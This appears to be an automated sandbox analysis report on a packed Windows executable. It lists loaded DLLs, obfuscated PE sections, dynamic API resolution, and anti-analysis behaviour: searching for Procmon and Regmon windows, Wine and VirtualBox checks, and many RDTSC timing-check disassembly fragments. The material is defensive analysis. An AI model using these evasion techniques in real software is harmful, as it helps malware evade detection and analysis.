Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1772032 > 1048576
Source: file.exe | Static PE information: Raw size of yyknqjng is bigger than: 0x100000 < 0x196600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yyknqjng:EW;ncuennkv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yyknqjng:EW;ncuennkv:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005B63C0
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b89ce should be: 0x1b2722
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: yyknqjng
Source: file.exe | Static PE information: section name: ncuennkv
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B88BA push 2C28C914h; mov dword ptr [esp], eax | 0_2_009B8925
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE0DD push ebp; mov dword ptr [esp], edi | 0_2_009DE0E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE0DD push ebx; mov dword ptr [esp], edi | 0_2_009DE0F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DE0DD push edx; mov dword ptr [esp], 2A0B6282h | 0_2_009DE274
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push 5E1F47ABh; mov dword ptr [esp], eax | 0_2_0089312D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push 0D682E55h; mov dword ptr [esp], ebx | 0_2_00893135
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push ebp; mov dword ptr [esp], esi | 0_2_0089313F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push 7A058314h; mov dword ptr [esp], eax | 0_2_0089316B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push ebx; mov dword ptr [esp], edx | 0_2_00893197
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push edx; mov dword ptr [esp], 6FFE5741h | 0_2_008931A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008930C7 push edx; mov dword ptr [esp], 103A2C13h | 0_2_008932DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098680C push ebp; mov dword ptr [esp], ecx | 0_2_00986810
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B78C5 push ecx; ret | 0_2_005B78D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 30C86650h; mov dword ptr [esp], ecx | 0_2_0094A109
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 01AEDA84h; mov dword ptr [esp], ebp | 0_2_0094A117
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push edi; mov dword ptr [esp], ecx | 0_2_0094A13E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 5E391000h; mov dword ptr [esp], ecx | 0_2_0094A1D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push ebp; mov dword ptr [esp], 56DF5C47h | 0_2_0094A1DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push edx; mov dword ptr [esp], 2A48B9E7h | 0_2_0094A253
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 3A63CC32h; mov dword ptr [esp], edi | 0_2_0094A2B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 7B7BB663h; mov dword ptr [esp], ebp | 0_2_0094A2F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push edi; mov dword ptr [esp], ecx | 0_2_0094A34C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 149BBE3Dh; mov dword ptr [esp], ebp | 0_2_0094A3E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push ebx; mov dword ptr [esp], eax | 0_2_0094A430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push ebx; mov dword ptr [esp], ecx | 0_2_0094A453
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push eax; mov dword ptr [esp], edi | 0_2_0094A540
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push eax; mov dword ptr [esp], ebp | 0_2_0094A5BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push 1BBA87D9h; mov dword ptr [esp], edx | 0_2_0094A680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push ebp; mov dword ptr [esp], edi | 0_2_0094A6A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A03E push edi; mov dword ptr [esp], eax | 0_2_0094A6EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E push 54CBE297h; mov dword ptr [esp], edi0_2_0094A71A
              Source: file.exeStatic PE information: section name: yyknqjng entropy: 7.953203836513533

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_005B63C0

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-28679
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99DDEE second address: 99DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F3BACE24FD8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add ebx, dword ptr [ebp+122D2920h] 0x00000029 mov dword ptr [ebp+122D289Ch], eax 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 ja 00007F3BACE24FDCh 0x00000038 popad 0x00000039 call 00007F3BACE24FE3h 0x0000003e pushad 0x0000003f mov eax, dword ptr [ebp+122D5691h] 0x00000045 mov bh, ah 0x00000047 popad 0x00000048 pop ebx 0x00000049 push 00000000h 0x0000004b adc ebx, 688EBE11h 0x00000051 xchg eax, esi 0x00000052 jmp 00007F3BACE24FDDh 0x00000057 push eax 0x00000058 jbe 00007F3BACE24FE4h 0x0000005e pushad 0x0000005f jc 00007F3BACE24FD6h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D0C7 second address: 99D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E12h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D0DE second address: 99D0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EEB6 second address: 99EEC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1F9E second address: 9A1FA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3BACE24FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FA8 second address: 9A1FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F3BAC7E5E08h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FB9 second address: 9A205E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BACE24FDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F3BACE24FD8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F3BACE24FD8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F3BACE24FD8h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d jmp 00007F3BACE24FE9h 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 jl 00007F3BACE24FDCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A205E second address: 9A2062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2062 second address: 9A2082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F3BACE24FDCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E036 second address: 99E03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F0D9 second address: 99F0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00DF second address: 9A00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A10D2 second address: 9A1176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F3BACE24FE4h 0x0000000d nop 0x0000000e movsx edi, ax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 xor edi, dword ptr [ebp+122D2CBDh] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F3BACE24FD8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3387h], ebx 0x00000045 mov eax, dword ptr [ebp+122D0A49h] 0x0000004b jmp 00007F3BACE24FDEh 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F3BACE24FD8h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 0000001Ch 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c or ebx, dword ptr [ebp+122D2B3Dh] 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00EC second address: 9A00F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F40 second address: 9A3F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1176 second address: 9A117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00F1 second address: 9A00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F44 second address: 9A3F51 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F51 second address: 9A3F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F55 second address: 9A3FE9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F3BAC7E5E1Eh 0x00000010 jmp 00007F3BAC7E5E18h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F3BAC7E5E08h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F3BAC7E5E08h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f movsx edi, dx 0x00000052 sbb edi, 328C3100h 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007F3BAC7E5E15h 0x0000005f push ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0198 second address: 9A01A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F19 second address: 9A4F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F1F second address: 9A4F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41EC second address: 9A4208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4208 second address: 9A421B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F3BACE24FD6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5046 second address: 9A504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5129 second address: 9A512D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC157 second address: 9AC15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC15C second address: 9AC161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946635 second address: 946653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E0Dh 0x00000009 jno 00007F3BAC7E5E06h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946653 second address: 946657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8E6 second address: 9AB8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8EB second address: 9AB8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8F1 second address: 9AB916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3BAC7E5E18h 0x0000000c jne 00007F3BAC7E5E06h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABA71 second address: 9ABA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBB9 second address: 9ABBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBC3 second address: 9ABBCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBCF second address: 9ABBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBEB second address: 9ABBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBEF second address: 9ABC27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F3BAC7E5E06h 0x00000011 jbe 00007F3BAC7E5E06h 0x00000017 jc 00007F3BAC7E5E06h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push esi 0x00000022 jl 00007F3BAC7E5E06h 0x00000028 jl 00007F3BAC7E5E06h 0x0000002e pop esi 0x0000002f pushad 0x00000030 jno 00007F3BAC7E5E06h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4DB second address: 9AF4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2905 second address: 9B294D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F3BAC7E5E0Ch 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F3BAC7E5E11h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 pushad 0x00000021 jbe 00007F3BAC7E5E06h 0x00000027 jc 00007F3BAC7E5E06h 0x0000002d popad 0x0000002e popad 0x0000002f mov eax, dword ptr [eax] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3DD4 second address: 9B3E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BACE24FDBh 0x00000009 popad 0x0000000a jc 00007F3BACE24FF5h 0x00000010 jbe 00007F3BACE24FD6h 0x00000016 jmp 00007F3BACE24FE9h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3E09 second address: 9B3E15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BAC7E5E0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B2A second address: 944B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9678 second address: 9B967F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B967F second address: 9B9685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9685 second address: 9B968B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B968B second address: 9B96BD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F3BACE24FDEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3BACE24FDEh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B96BD second address: 9B96C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DE7 second address: 9B8DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DEB second address: 9B8E29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E17h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F3BAC7E5E1Dh 0x00000011 jmp 00007F3BAC7E5E17h 0x00000016 pushad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E29 second address: 9B8E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F3BACE24FD6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E38 second address: 9B8E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8E3C second address: 9B8E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3BACE24FE2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B90E8 second address: 9B9126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E16h 0x00000007 push edx 0x00000008 jmp 00007F3BAC7E5E16h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B93AC second address: 9B93B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
